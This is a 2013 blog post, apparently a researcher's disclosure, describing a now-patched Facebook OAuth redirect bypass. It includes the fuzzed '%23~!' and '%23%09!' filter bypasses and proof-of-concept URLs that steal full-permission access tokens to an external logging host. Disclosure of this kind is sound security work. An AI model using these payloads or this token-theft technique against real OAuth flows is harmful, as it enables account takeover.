29 March 2013

Category: Hacks
29 March 2013,
 4

 

Hello there,

I’ve decided to share one of my favorite flaws in facebook.com. This flaw essentially let me take over any Facebook account. To do this, I had to steal unique access tokens that grant me full access over the accounts. To be clear, the victim’s account does not need to have any installed apps for this to work. The bug works on every browser.

In order for me to exploit this flaw, the victim only needed to visit a particular webpage.

OAuth is used primarily to facilitate communication between Apps and Facebook users. Generally users need to allow the application to gain access to their account before communication can really begin.

Facebook applications generate a number of different access or permission warnings.

For example:

Diamond Dash and Texas Hold’em Poker are only allowed to post basic information on the user’s wall.

I discovered a way to gain full access to the user’s account (i.e. gain the ability to read inbox/outbox, manage pages, see private photos, etc.) even if they have not installed a single app. With this flaw, there is also no “expired date” for the token. The token in my attack never expires unless the victim changes their password.

The URL of the OAuth dialog looks like this:

https://www.facebook.com/dialog/oauth/?app_id=YOUR_APP_ID&next=YOUR_REDIRECT_URL&state=YOUR_STATE_VALUE&scope=COMMA_SEPARATED_LIST_OF_PERMISSION_NAMES

All applications on Facebook have different “app IDs.” For instance, Diamond Dash is designated as “app_id=2” while Texas Hold’em Poker is “app_id=3.”

The next and redirect_uri parameters (next=, redirect_uri=) only allows the owner app domain. Thus, “app_id=3” belong to Texas Hold’em Poker and the “next” parameter will only allow the zynga.com domain (next=http://zynga.com). But, if the domain is different (e.g. nirgoldshlager.com) in the “next” and “redirect_uri) parameters, Facebook will not allow this action to be performed.

Facebook links up your app_id and the next parameter. They also send an access token through GET request to the owner application after the user permitted access. Now that we’ve got a dea of how Facebook OAuth works, let’s take a look at my findings. I thought over my options and I wondered if I could redirect the application OAuth request to a different “Next” URL. I first tried to change the “next” parameter to a different domain, but they blocked that action. Then, I attempted to change the “next” parameter to the actual facebook.com domain, but, again, I was thwarted with a general error message.

I discovered that subdomains (a la xxx.facebook.com) will permit this action, but trying to access folders or files in x.facebook.com (x.facebook.com/xx/x.php) will result in a block from Facebook. Then I noticed that facebook.com uses a Hash sign and an exclamation point in their URL (x.facebook.com/#!/xxxx). So, I attempted to carry out this action in the “next” parameter (next=x.facebook.com/%23!/). But, Facebook blocked me yet again! Then I tried to put something in between the hash sign and the exclamation point (%23x!), and Facebook let this action through.

It seemed as though there was Reg-ex protection.

But wait!

If we use something like this—(https://beta.facebook.com/#xxx!/messages/)—then the action won’t treat it in the same way as it might with the hash sign and the exclamation point. It will also not redirect us to the message screen. I needed to find a way around it so I just started to fuzz characters in between the exclamation point and the hash tag so that my browsers (IE, Chrome, Safari, and Firefox) treat it like the actual symbols: #!.

Now, for the fuzzing!

Result:

%23~!   (Works on all browsers)

%23%09! (Works on all browsers)

Cool!

This little trick works on domains like touch.facebook.com/#%09!/, m.facebok.com/#~!/, or virtually any other Facebook mobile or touch domain.

So, I was then able to redirect the victim to any files or directories in any Facebook subdomain. After that, I created a Facebook application that redirects the victim to an external website used for collecting the access_token of the victim.

For Example: (Zynga Texas Holdem OAuth Bypass):

https://www.facebook.com/connect/uiserver.php?app_id=2389801228&next=https%3A%2F%2Ftouch.facebook.com%2F%23~!%2Fapps%2Ftestestestte%2F&display=page&fbconnect=1&method=permissions.request&response_type=token

 

Using the “next” parameter will redirect the user to my Facebook application (touch.facebook.com/apps/testestestte). My Facebook application will then redirect them to files.nirgoldshlager.com where the victim’s access_token will be saved in a log file (files.nirgoldshlager.com/log.txt).

Amazing! I am now able to steal access tokens for any Facebook application.

But wait (again)!!!

 

HERE COMES THE REAL DEAL:

In order for the attack to be successful, the victim needs to use a Facebook application (e.g. Diamond Dash, etc.). These apps really only have basic permissions. Luckily, we can change the scope of those permissions by setting a new permission. Unfortunately, this method is not that powerful as the victim still needs to accept the terms of the new permission.

(https://www.facebook.com/connect/uiserver.php?app_id=2389801228&next=http://zynga.com&display=page&fbconnect=1&method=permissions.request&response_type=token&perms=ads_management%20create_event%20create_note%20email%20export_stream%20manage_friendlists%20manage_groups%20manage_notifications%20manage_pages%20offline_access%20photo_upload%20publish_actions%20publish_checkins%20publish_stream%20read_friendlists%20read_insights%20read_mailbox%20read_page_mailboxes%20read_requests)

I wanted something with a lot more power!

I wanted to be able to gain access to inbox/outbox, ad management, photos, videos, and everything else on the victim’s account without the victim having to install an application.

So, I started to think. How is this possible? What if I used a different app_id? Maybe I can use the app_id for Facebook Messenger, for example. Do users need to actively permit the Facebook Messenger app within the contexts of their Facebook account?

Nope.

Facebook has built-in applications with terms that users never need to accept. These applications have complete access to any account. The access_token also never expires in Facebook messenger.

The access_token only expires when the victim changes their password, but that almost never happens.

PoC (Works on all browsers and doesn’t require an installed application on the victim’s account):

https://www.facebook.com/connect/uiserver.php?app_id=220764691281998&next=https%3A%2F%2Ftouch.facebook.com%2F%23~!%2Fapps%2Ftestestestte%2F&display=page&fbconnect=1&method=permissions.request&response_type=token

 

The Facebook Security Team repaired this bug.

 

Full description of permission for Facebook messenger app:

 

ads_management create_event create_note email export_stream  manage_friendlists manage_groups manage_notifications manage_pages  offline_access photo_upload publish_actions publish_checkins  publish_stream read_friendlists read_insights read_mailbox  read_page_mailboxes read_requests read_stream rsvp_event share_item sms  status_update video_upload xmpp_login

 

This also works on 2-step verification accounts. But, when it comes to the access_token, the 2-step verification will fail.

 

And???,

 

 

PoC Video:

 

 

How I Hacked Facebook OAuth To Get Full Permission On Any Facebook Account from Nir on Vimeo.

 

By @Nirgoldshlager

Cya Next time!

4 responses on “How I Hacked Facebook OAuth To Get Full Permission On Any Facebook Account (Without App “Allow” Interaction)

  1. Clifford says:

    Nice bro! Keep it up.

  2. […] How I Hacked Facebook OAuth To Get Full Permission On Any Facebook Account (Without App “Allow… […]

  3. Alex says:

    It’s pached 🙁 To moment these btw awesome articles go online they jump on the problem and fix it within hours. No wonder why most people keep it to themselves so they won’t get patched that soon.
    Anyways, good job guys!

  4. stephen says:

    Instead of telling people how to hack a page I need someone to tell me how to unhack. I have been royally hacked recently. I had a page on my account which advertised my business and someone has hacked in and basically substituted their page for mine (the app_id’s are different) however I am unable to do anything about it because the person has added a “phantom” admin to the page and I can’t delete it under admin roles because “save” changes has been disabled. I can’t deactivate the account (submit disabled) and I can’t report a violation because again it doesn’t submit the form. I have no way of letting facebook know I have a problem because I can’t get the forms to send and they don’t provide any other means of communication. I cannot even delete my account! (again submit disabled!). If you know of any forum or techy that has some answers I can use to recover this I would be grateful for an email. I am kinda helpless to this attack right now.

Leave a Reply

Your email address will not be published. Required fields are marked *